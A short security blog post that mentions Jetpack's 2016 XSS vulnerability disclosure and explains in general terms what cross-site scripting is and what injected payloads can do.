May 26th 2016 jetpack disclosed
a XSS vulnerability discovered in their popular plugin.
We would to take this opportunity and describe what is XSS.
Cross Site Scripting or XSS attack refers to injection of the malicious code or malicious payload into pages of legitimate website. Further, when these compromised pages are visited by website users, the injected malicious code (or payload) is executed by client-side application (visitor's web browser) and performs the actual malicious action such as: redirecting visitor to another website, download and installation of malicious code, showing adult ads and etc...
XSS vulnerabilities could be very trivial and be detected by XSS vulnerability scanner. However, in its complex variants it may take several years until it gets uncovered (like with Jetpack plugin where XSS vulnerability remained undetected since 2012).